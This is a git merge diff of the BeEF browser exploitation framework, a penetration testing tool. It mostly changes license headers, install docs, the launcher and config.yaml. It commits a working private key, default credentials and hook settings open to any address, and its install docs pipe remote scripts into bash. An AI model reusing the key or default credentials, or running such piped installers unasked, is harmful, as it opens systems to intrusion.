Merge remote-tracking branch 'origin/master'

More changed license headers
Changed license header
2012-11-02 15:43:51 +10:00 · 2012-11-02 15:27:01 +10:00 · 2012-11-02 14:26:10 +10:00 · 2012-11-02 14:05:15 +10:00 · 2012-11-02 14:00:44 +10:00 · 2012-11-02 13:57:33 +10:00
832 changed files with 51833 additions and 9286 deletions
--- a/.gitignore
+++ b/.gitignore
@@ -1,2 +1,3 @@
 beef.db
 test/msf-test
+custom-config.yaml
--- a/24
+++ b/24
@@ -1,19 +1,9 @@
 # BeEF's Gemfile

 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #

 # Gems only required on Windows, or with specific Windows issues
@@ -25,6 +15,9 @@ else
 end

 gem "thin"
+gem "sinatra", "1.3.2"
+gem "em-websocket", "~> 0.3.6"
+gem "jsmin", "~> 1.0.1"
 gem "ansi"
 gem "term-ansicolor", :require => "term/ansicolor"
 gem "dm-core"
@@ -36,6 +29,9 @@ gem "erubis"
 gem "dm-migrations"
 gem "msfrpc-client"

+# notifications
+gem "twitter"
+
 if ENV['BEEF_TEST']
 # for running unit tests
  gem "test-unit"
@@ -48,6 +44,8 @@ if ENV['BEEF_TEST']
  # sudo apt-get install libxslt-dev libxml2-dev
  # sudo port install libxml2 libxslt
  gem "capybara"
+  #RESTful API tests/generic command module tests
+  gem "rest-client", "~> 1.6.7"
 end

 source "http://rubygems.org"
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -1,52 +0,0 @@
-GEM
-  remote: http://rubygems.org/
-  specs:
-    addressable (2.2.6)
-    ansi (1.4.1)
-    daemons (1.1.5)
-    data_objects (0.10.7)
-      addressable (~> 2.1)
-    dm-core (1.2.0)
-      addressable (~> 2.2.6)
-    dm-do-adapter (1.2.0)
-      data_objects (~> 0.10.6)
-      dm-core (~> 1.2.0)
-    dm-migrations (1.2.0)
-      dm-core (~> 1.2.0)
-    dm-sqlite-adapter (1.2.0)
-      dm-do-adapter (~> 1.2.0)
-      do_sqlite3 (~> 0.10.6)
-    do_sqlite3 (0.10.7)
-      data_objects (= 0.10.7)
-    erubis (2.7.0)
-    eventmachine (0.12.10)
-    json (1.6.4)
-    librex (0.0.52)
-    msfrpc-client (1.0.1)
-      librex (>= 0.0.32)
-      msgpack (>= 0.4.5)
-    msgpack (0.4.6)
-    parseconfig (0.5.2)
-    rack (1.4.0)
-    term-ansicolor (1.0.7)
-    thin (1.3.1)
-      daemons (>= 1.0.9)
-      eventmachine (>= 0.12.6)
-      rack (>= 1.0.0)
-
-PLATFORMS
-  ruby
-
-DEPENDENCIES
-  ansi
-  data_objects
-  dm-core
-  dm-migrations
-  dm-sqlite-adapter
-  erubis
-  eventmachine (= 0.12.10)
-  json
-  msfrpc-client
-  parseconfig
-  term-ansicolor
-  thin
--- a/INSTALL.txt
+++ b/INSTALL.txt
@@ -0,0 +1,71 @@
+===============================================================================
+   
+    Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+    Browser Exploitation Framework (BeEF) - http://beefproject.com
+    See the file 'doc/COPYING' for copying permission
+
+===============================================================================
+
+Installation
+------------
+
+   1. Prerequisites (platform independent)
+   2. Prerequisites (Windows)
+   3. Prerequisites (Linux)
+   4. Prerequisites (Mac OSX)
+   5. Install instructions
+   6. Run instructions
+
+
+
+   1. Prerequisites (platform independent)
+
+      BeEF requires ruby 1.9 and the "bundler" gem. Bundler can be installed by:
+
+      gem install bundler
+
+      
+   2. Prerequisites (Windows)
+      
+      Windows requires the sqlite.dll.  Simply grab the zip file below and extract it to your Ruby bin directory:
+
+	  http://www.sqlite.org/sqlitedll-3_7_0_1.zip
+      
+
+   3. Prerequisites (Linux)
+
+      !!! This must be done PRIOR to running the bundle install command !!!
+      
+      On linux you will need to find the packages specific to your distribution for sqlite.  An example for Ubuntu systems is:
+
+      3.0. sudo apt-get install libsqlite3-dev sqlite3 sqlite3-doc
+      3.1. install rvm from rvm.beginrescueend.com, this takes care of the various incompatable and conflicting ruby packages that are required
+      3.2. rvm install 1.9.2
+      3.3. rvm use 1.9.2
+	  
+   4. Prerequisites (Mac OSX)
+   
+      - XCode: provides the sqlite support BeEF needs
+      
+      - Ruby 1.9
+      	To install RVM and Ruby 1.9.3 on Mac OS:  
+      	$ bash -s stable < <(curl -s https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer) source ~/.bash_profile 
+      	$ rvm install 1.9.3-p0 --with-gcc=clang
+		$ rvm use 1.9.3
+      
+
+   5. Install instructions
+   
+      Obtain application code either by downloading an archive from https://github.com/beefproject/beef/zipball/master or cloning the GIT repo git@github.com:beefproject/beef.git
+
+	  Navigate to the ruby source directory and run:
+
+	  bundle install
+
+      Bundler installs all the pre-requisite gems.
+
+   6. Run instructions
+
+      Simply run:
+
+      ./beef
--- a/153
+++ b/153
@@ -1,79 +1,74 @@
-
-   Copyright 2012 Wade Alcorn wade@bindshell.net
-
-   Licensed under the Apache License, Version 2.0 (the "License");
-   you may not use this file except in compliance with the License.
-   You may obtain a copy of the License at
-
-       http://www.apache.org/licenses/LICENSE-2.0
-
-   Unless required by applicable law or agreed to in writing, software
-   distributed under the License is distributed on an "AS IS" BASIS,
-   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-   See the License for the specific language governing permissions and
-   limitations under the License.
-
-Most of the contents of this file will eventually be added to /install.rb. In the meantime tips, hints and guides for installing BeEF should be kept here.
-
-=============================================
-
-   1. Prerequisites (platform independent)
-   2. Prerequisites (Windows)
-   3. Prerequisites (Linux)
-   4. Prerequisites (Mac OSX)
-   5. Install instructions
-   6. Run instructions
-
-
-
-   1. Prerequisites (platform independent)
-
-      BeEF requires ruby 1.9 and the "bundler" gem. Bundler can be installed by:
-
-      gem install bundler
-
-      
-   2. Prerequisites (Windows)
-      
-      Windows requires the sqlite.dll.  Simply grab the zip file below and extract it to your Ruby bin directory:
-
-	  http://www.sqlite.org/sqlitedll-3_7_0_1.zip
-      
-
-   3. Prerequisites (Linux)
-
-      !!! This must be done PRIOR to running the bundle install command !!!
-      
-      On linux you will need to find the packages specific to your distribution for sqlite.  An example for Ubuntu systems is:
-
-      3.0. sudo apt-get install libsqlite3-dev sqlite3 sqlite3-doc
-      3.1. install rvm from rvm.beginrescueend.com, this takes care of the various incompatable and conflicting ruby packages that are required
-      3.2. rvm install 1.9.2
-      3.3. rvm use 1.9.2
-	  
-   4. Prerequisites (Mac OSX)
-   
-      - XCode: provides the sqlite support BeEF needs
-      
-      - Ruby 1.9
-      	To install RVM and Ruby 1.9.3 on Mac OS:  
-      	$ bash -s stable < <(curl -s https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer) source ~/.bash_profile 
-      	$ rvm install 1.9.3-p0 --with-gcc=clang
-		$ rvm use 1.9.3
-      
-
-   5. Install instructions
-   
-      Obtain application code either by downloading an archive from https://github.com/beefproject/beef/zipball/master or cloning the GIT repo git@github.com:beefproject/beef.git
-
-	  Navigate to the ruby source directory and run:
-
-	  bundle install
-
-      Bundler installs all the pre-requisite gems.
-
-   6. Run instructions
-
-      Simply run:
-
-      ./beef
+===============================================================================
+   
+    Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+    Browser Exploitation Framework (BeEF) - http://beefproject.com
+    See the file 'doc/COPYING' for copying permission
+
+===============================================================================
+
+What is BeEF?
+-------------
+
+BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.
+
+Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
+
+
+Get Involved 
+------------
+
+You can get in touch with the BeEF team. Just check out the following: 
+
+
+Please, send us pull requests!
+
+Web: http://beefproject.com/
+
+Mail: beef-subscribe@bindshell.net
+
+IRC: ircs://irc.freenode.net/beefproject
+
+Twitter: @beefproject
+
+
+Requirements
+------------
+
+* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher
+* [Ruby](http://rubylang.org) 1.9.2 RVM or higher
+* [SQLite](http://sqlite.org) 3.x
+* The following GEMS: 
+   - bundler 
+   - thin
+   - Sinatra 
+   - ANSI 
+   - TERM-ANSIcolor 
+   - dm-core 
+   - json 
+   - data_objects 
+   - dm-sqlite-adapter 
+   - parseconfig 
+   - erubis 
+   - dm-migrations 
+   - msfrpc-client 
+   - eventmachine
+   - win32console (Windows Only)
+
+
+Quick Start
+----------- 
+
+__The following is for the impatient.__ 
+
+For full installation details (including on Microsoft Windows), please refer to INSTALL.txt. 
+
+   $ bash -s stable < <(curl -s https://raw.github.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef)
+
+
+Usage 
+----- 
+
+To get started, simply execute beef and follow the instrustions: 
+
+   $ ./beef
+
--- a/README.mkd
+++ b/README.mkd
@@ -0,0 +1,74 @@
+===============================================================================
+   
+    Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+    Browser Exploitation Framework (BeEF) - http://beefproject.com
+    See the file 'doc/COPYING' for copying permission
+
+===============================================================================
+
+What is BeEF?
+-------------
+
+__BeEF__ is short for __The Browser Exploitation Framework__. It is a penetration testing tool that focuses on the web browser.
+
+Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
+
+
+Get Involved 
+------------
+
+You can get in touch with the BeEF team. Just check out the following: 
+
+
+__Please, send us pull requests!__
+
+__Web:__ http://beefproject.com/
+
+__Mail:__ beef-subscribe@bindshell.net
+
+__IRC:__ ircs://irc.freenode.net/beefproject
+
+__Twitter:__ @beefproject
+
+
+Requirements
+------------
+
+* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher
+* [Ruby](http://rubylang.org) 1.9.2 RVM or higher
+* [SQLite](http://sqlite.org) 3.x
+* The following GEMS: 
+   - bundler 
+   - thin
+   - Sinatra 
+   - ANSI 
+   - TERM-ANSIcolor 
+   - dm-core 
+   - json 
+   - data_objects 
+   - dm-sqlite-adapter 
+   - parseconfig 
+   - erubis 
+   - dm-migrations 
+   - msfrpc-client 
+   - eventmachine
+   - win32console (Windows Only)
+
+
+Quick Start
+----------- 
+
+__The following is for the impatient.__ 
+
+For full installation details (including on Microsoft Windows), please refer to INSTALL.txt. 
+
+       $ curl https://raw.github.com/beefproject/beef/a6a7536e/install-beef | bash -s stable
+
+
+Usage 
+----- 
+
+To get started, simply execute beef and follow the instructions: 
+
+       $ ./beef
+
--- a/60
+++ b/60
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #

 task :default => ["quick"]
@@ -56,7 +46,7 @@ task :msf => ["install", "msf_install"]  do
 end

 task :install do
-  sh "export BEEF_TEST=true;bundle install > /dev/null"
+  sh "export BEEF_TEST=true;bundle install"
 end

 ################################
@@ -152,3 +142,45 @@ task :dmg do
  puts "\nBeEF.dmg created\n"
 end

+
+################################
+# Create CDE Package
+# This will download and make the CDE Executable and 
+# gnereate a CDE Package in cde-package
+
+task :cde do
+  puts "\nCloning and Making CDE...";
+  sh "git clone git://github.com/pgbovine/CDE.git";
+  Dir.chdir "CDE";
+  sh "make";
+  Dir.chdir "..";
+  puts "\nCreating CDE Package...\n";
+  sh "bundle install"
+  Rake::Task['cde_beef_start'].invoke
+  Rake::Task['beef_stop'].invoke
+  puts "\nCleaning Up...\n";
+  sleep (2);	
+  sh "rm -rf CDE";
+  puts "\nCDE Package Created...\n";
+ end
+
+################################
+# CDE/BeEF environment set up
+
+@beef_process_id = nil;
+
+task :cde_beef_start => 'beef' do
+  printf "Starting CDE BeEF (wait 10 seconds)..."
+  @beef_process_id = IO.popen("./CDE/cde ruby beef -x 2> /dev/null", "w+")
+  delays = [2, 2, 1, 1, 1, 0.5, 0.5 , 0.5, 0.3, 0.2, 0.1, 0.1, 0.1, 0.05, 0.05]
+  delays.each do |i| # delay for 10 seconds
+    printf '.'
+    sleep (i)
+  end
+  puts '.'
+end
+
+
+################################
+
+
--- a/18
+++ b/18
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #

-0.4.3.2-alpha
+0.4.3.8-alpha
--- a/72
+++ b/72
@@ -1,19 +1,9 @@
 #!/usr/bin/env ruby

 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #

 # stop deprecation warning from being displayed
@@ -41,15 +31,35 @@ end
 # @note Require core loader's
 require 'core/loader'

-# @note Starts configuration system
-config = BeEF::Core::Configuration.instance
+# @note Initialize the Configuration object. Eventually loads a different config.yaml if -c flag was passed.
+if BeEF::Core::Console::CommandLine.parse[:ext_config].empty?
+  config = BeEF::Core::Configuration.new("#{$root_dir}/config.yaml")
+else
+  config = BeEF::Core::Configuration.new("#{$root_dir}/#{BeEF::Core::Console::CommandLine.parse[:ext_config]}")
+end
+
+# @note After the BeEF core is loaded, bootstrap the rest of the framework internals
+require 'core/bootstrap'

 # @note Loads enabled extensions
 BeEF::Extensions.load

+# @note Prints the BeEF ascii art if the -a flag was passed
+if BeEF::Core::Console::CommandLine.parse[:ascii_art] == true
+  BeEF::Core::Console::Banners.print_ascii_art
+end
+
+# @note Check if port and WebSocket port need to be updated from command line parameters
+unless BeEF::Core::Console::CommandLine.parse[:port].empty?
+  config.set('beef.http.port', BeEF::Core::Console::CommandLine.parse[:port])
+end
+
+unless BeEF::Core::Console::CommandLine.parse[:ws_port].empty?
+  config.set('beef.http.websocket.port', BeEF::Core::Console::CommandLine.parse[:ws_port])
+end
+
 # @note Prints BeEF welcome message
-#BeEF::Extension::Console::Banners.print_ascii_art
-BeEF::Extension::Console::Banners.print_welcome_msg
+BeEF::Core::Console::Banners.print_welcome_msg

 # @note Loads enabled modules
 BeEF::Modules.load
@@ -61,7 +71,7 @@ Socket.do_not_reverse_lookup = true
 case config.get("beef.database.driver")
  when "sqlite"
    DataMapper.setup(:default, "sqlite3://#{$root_dir}/#{config.get("beef.database.db_file")}")
-  when "mysql","postgres"
+  when "mysql", "postgres"
    DataMapper.setup(:default,
                     :adapter => config.get("beef.database.driver"),
                     :host => config.get("beef.database.db_host"),
@@ -75,8 +85,7 @@ case config.get("beef.database.driver")
 end

 # @note Resets the database if the -x flag was passed
-# @todo Change reference from Extension::Console to Core::Console once the console extension is merged with the core
-if BeEF::Extension::Console.resetdb?
+if BeEF::Core::Console::CommandLine.parse[:resetdb]
  print_info 'Resetting the database for BeEF.'
  DataMapper.auto_migrate!
 else
@@ -94,10 +103,23 @@ http_hook_server = BeEF::Core::Server.instance
 http_hook_server.prepare

 # @note Prints information back to the user before running the server
-BeEF::Extension::Console::Banners.print_loaded_extensions
-BeEF::Extension::Console::Banners.print_loaded_modules
-BeEF::Extension::Console::Banners.print_network_interfaces_count
-BeEF::Extension::Console::Banners.print_network_interfaces_routes
+BeEF::Core::Console::Banners.print_loaded_extensions
+BeEF::Core::Console::Banners.print_loaded_modules
+BeEF::Core::Console::Banners.print_network_interfaces_count
+BeEF::Core::Console::Banners.print_network_interfaces_routes
+
+#@note Prints the API key needed to use the RESTful API
+print_info "RESTful API key: #{BeEF::Core::Crypto::api_token}"
+
+#@note Starts the WebSocket server
+if config.get("beef.http.websocket.enable")
+  BeEF::Core::Websocket::Websocket.instance
+  print_info "Starting WebSocket server on port [#{config.get("beef.http.websocket.port").to_i}], timer [#{config.get("beef.http.websocket.alive_timer")}]"
+  if config.get("beef.http.websocket.secure")
+    print_info "Starting WebSocketSecure server on port [#{config.get("beef.http.websocket.secure_port").to_i}], timer [#{config.get("beef.http.websocket.alive_timer")}]"
+  end
+end
+

 # @note Call the API method 'pre_http_start'
 BeEF::API::Registrar.instance.fire(BeEF::API::Server, 'pre_http_start', http_hook_server)
@@ -109,7 +131,7 @@ if config.get("beef.extension.console.shell.enable") == true
  begin
    FileUtils.mkdir_p(File.expand_path(config.get("beef.extension.console.shell.historyfolder")))
    BeEF::Extension::Console::Shell.new(BeEF::Extension::Console::Shell::DefaultPrompt,
-                                        BeEF::Extension::Console::Shell::DefaultPromptChar,{'config' => config, 'http_hook_server' => http_hook_server}).run
+                                        BeEF::Extension::Console::Shell::DefaultPromptChar, {'config' => config, 'http_hook_server' => http_hook_server}).run
  rescue Interrupt
  end
 else
--- a/beef_cert.pem
+++ b/beef_cert.pem
@@ -0,0 +1,19 @@
+-----BEGIN CERTIFICATE-----
+MIIDDjCCAnegAwIBAgIJAKNYRH/AaB3DMA0GCSqGSIb3DQEBBQUAMIGfMQswCQYD
+VQQGEwJBVTEUMBIGA1UECAwLQm92aW5lIExhbmQxDTALBgNVBAcMBEJlRUYxDTAL
+BgNVBAoMBEJlRUYxDTALBgNVBAsMBEJlRUYxJzAlBgNVBAMMHkJyb3dzZXIgRXhw
+bG9pdGF0aW9uIEZyYW1ld29yazEkMCIGCSqGSIb3DQEJARYVQmVFRkBkb250d3Jp
+dGVtZS5CZUVGMB4XDTEyMDgwNjEzMDUzOFoXDTEzMDgwNjEzMDUzOFowgZ8xCzAJ
+BgNVBAYTAkFVMRQwEgYDVQQIDAtCb3ZpbmUgTGFuZDENMAsGA1UEBwwEQmVFRjEN
+MAsGA1UECgwEQmVFRjENMAsGA1UECwwEQmVFRjEnMCUGA1UEAwweQnJvd3NlciBF
+eHBsb2l0YXRpb24gRnJhbWV3b3JrMSQwIgYJKoZIhvcNAQkBFhVCZUVGQGRvbnR3
+cml0ZW1lLkJlRUYwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBALCxzu+rOTt2
+VBM5X5KL2xpDvMJ7wT0BSVgbkEF9Pd3+h3NbB/LST0n+Mwtnk4wLzmjmNiob3EdP
+0l+pKgIZYT8yHMvI3pwp0hmpE3D2bALyiQTOTjF0IhUeIYa9ZhEyeN+PgA6+Hs0Z
+F/0y0El2XjkPF42Dnmp9mLTSfScv1v4xAgMBAAGjUDBOMB0GA1UdDgQWBBTaXny0
+kTye7CAr0ronsg0ob63+kTAfBgNVHSMEGDAWgBTaXny0kTye7CAr0ronsg0ob63+
+kTAMBgNVHRMEBTADAQH/MA0GCSqGSIb3DQEBBQUAA4GBABTy5s/XRd6iBwxOgV6N
+B+cTRgmgHciujbI+0p4TkOkHvQPhhcD3207ndWWwv+Mc2XeQcXNaOfYUDkeCs64N
+JffqThykYOdagvCu1Gecw9BEKeijS9MAuNvtvP7fcUNUql+VeTFbxMBPGDhusafz
+GkY0IBg9+j6XX4JwEXxCGt0a
+-----END CERTIFICATE-----
--- a/beef_key.pem
+++ b/beef_key.pem
@@ -0,0 +1,16 @@
+-----BEGIN PRIVATE KEY-----
+MIICeAIBADANBgkqhkiG9w0BAQEFAASCAmIwggJeAgEAAoGBALCxzu+rOTt2VBM5
+X5KL2xpDvMJ7wT0BSVgbkEF9Pd3+h3NbB/LST0n+Mwtnk4wLzmjmNiob3EdP0l+p
+KgIZYT8yHMvI3pwp0hmpE3D2bALyiQTOTjF0IhUeIYa9ZhEyeN+PgA6+Hs0ZF/0y
+0El2XjkPF42Dnmp9mLTSfScv1v4xAgMBAAECgYAKpDrNTmedACxiGAN8hPXGKCw3
+HlLuBKTRLJ/Mgel29DxeIy5gXnAuCaQzXKKTPabJxIugj5r9pH4MCtkf1T15Aib6
+4MFdx4UegllMUo7eUiuCtSmK9s0wEtJjShujBl4qQ10ZtWUh4Vd/clS88IjM/iPI
+5Ocoph5PUgFt/tX7DQJBAOkGptgdri39bRiSGaR/Si6YYpmMUFoQt+s2id8yH9QS
+26o8cHZKCahSiWLNi4rSzEJIOpXnP3n+Dcq2JttDWGcCQQDCHWgWSpdnX8uqp/Qo
+yp0RZJwyBFoba4bWhzoQJj+39P0+4FBaMlZyLHZ7nd4z0JiE5S3qA9xi8zjQVrrI
+rTWnAkEAmpPxBZfavWNJhW0VWYue1/36GkV73+MLPhq1pruHZZUE5o6lQ7KlaWUn
+AcW79WEUYjursVjvQKuI1pmyeOzZrQJBAIGQHSxbxyjBgPA8QDSF4EZ+r96Wlwoc
+QBiqk6+5x+fiBrJUCG3bkWWNldu2qFxPS63QRlAfGZeWHgK5ENzm95sCQQCe81hU
+WaVM9bmt0ZvfhfQXfgvf3xKNUFemd4skTMUDgNCH1OFULB/Mz16kJDdy0q0qUS88
+yBgay+U9QuoEO425
+-----END PRIVATE KEY-----
--- a/config.yaml
+++ b/config.yaml
@@ -1,43 +1,55 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 # BeEF Configuration file

 beef:
-    version: '0.4.3.2-alpha'
+    version: '0.4.3.8-alpha'
    debug: false

    restrictions:
-        # subnet of browser ip addresses that can hook to the framework 
+        # subnet of browser ip addresses that can hook to the framework
        permitted_hooking_subnet: "0.0.0.0/0"
-        # subnet of browser ip addresses that can connect to the UI 
-        # permitted_ui_subnet = "127.0.0.1/32"
+        # subnet of browser ip addresses that can connect to the UI
+        # permitted_ui_subnet: "127.0.0.1/32"
        permitted_ui_subnet: "0.0.0.0/0"
-    
+
    http:
        debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
        host: "0.0.0.0"
        port: "3000"
        # if running behind a nat set the public ip address here
        #public: ""
+        #public_port: "" # port setting is experimental
        dns: "localhost"
        panel_path: "/ui/panel"
        hook_file: "/hook.js"
        hook_session_name: "BEEFHOOK"
        session_cookie_name: "BEEFSESSION"

+        # Prefer WebSockets over XHR-polling when possible.
+        websocket:
+          enable: false
+          secure: true # use WebSocketSecure work only on https domain and whit https support enabled in BeEF
+          port: 61985 # WS: good success rate through proxies
+          secure_port: 61986 # WSS
+          alive_timer: 1000 # poll BeEF every second
+
+        # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
+        web_server_imitation:
+            enable: false
+            type: "apache" #supported: apache, iis
+
+        # Experimental HTTPS support for the hook / admin / all other Thin managed web services
+        https:
+            enable: false
+            # In production environments, be sure to use a valid certificate signed for the value
+            # used in beef.http.dns (the domain name of the server where you run BeEF)
+            key: "beef_key.pem"
+            cert: "beef_cert.pem"
+
    database:
        # For information on using other databases please read the
        # README.databases file
@@ -47,7 +59,7 @@ beef:

        # db_file is only used for sqlite
        db_file: "beef.db"
-        
+
        # db connection information is only used for mysql/postgres
        db_host: "localhost"
        db_name: "beef"
@@ -55,16 +67,27 @@ beef:
        db_passwd: "beef123"
        db_encoding: "UTF-8"

+    # Credentials to authenticate in BeEF. Used by both the RESTful API and the Admin_UI extension
+    credentials:
+        user:   "beef"
+        passwd: "beef"
+
    crypto_default_value_length: 80

    # You may override default extension configuration parameters here
    extension:
        requester:
-            enable: true 
+            enable: true
        proxy:
-            enable: true 
+            enable: true
        metasploit:
            enable: false
+        social_engineering:
+            enable: true
+        evasion:
+            enable: false
        console:
-            shell:
+             shell:
                enable: false
+        ipec:
+            enable: true
--- a/core/api.rb
+++ b/core/api.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #

 module BeEF
@@ -60,10 +50,9 @@ module BeEF
      # @param [String] method the method of the class
      # @param [Array] params an array of parameters that need to be matched
      # @return [Boolean] whether or not the owner is registered
-      # @todo Change the param matching to use the new :is_matched_params?() method - Issue #479
      def registered?(owner, c, method, params = [])
        @registry.each{|r|
-          if r['owner'] == owner and r['class'] == c and r['method'] == method and params == r['params']
+          if r['owner'] == owner and r['class'] == c and r['method'] == method and self.is_matched_params?(r, params)
            return true
          end
        }
--- a/core/api/extension.rb
+++ b/core/api/extension.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #

 module BeEF
--- a/core/api/extensions.rb
+++ b/core/api/extensions.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
  module API
--- a/core/api/main/configuration.rb
+++ b/core/api/main/configuration.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module API
--- a/core/api/main/migration.rb
+++ b/core/api/main/migration.rb
@@ -1,17 +1,7 @@
 #
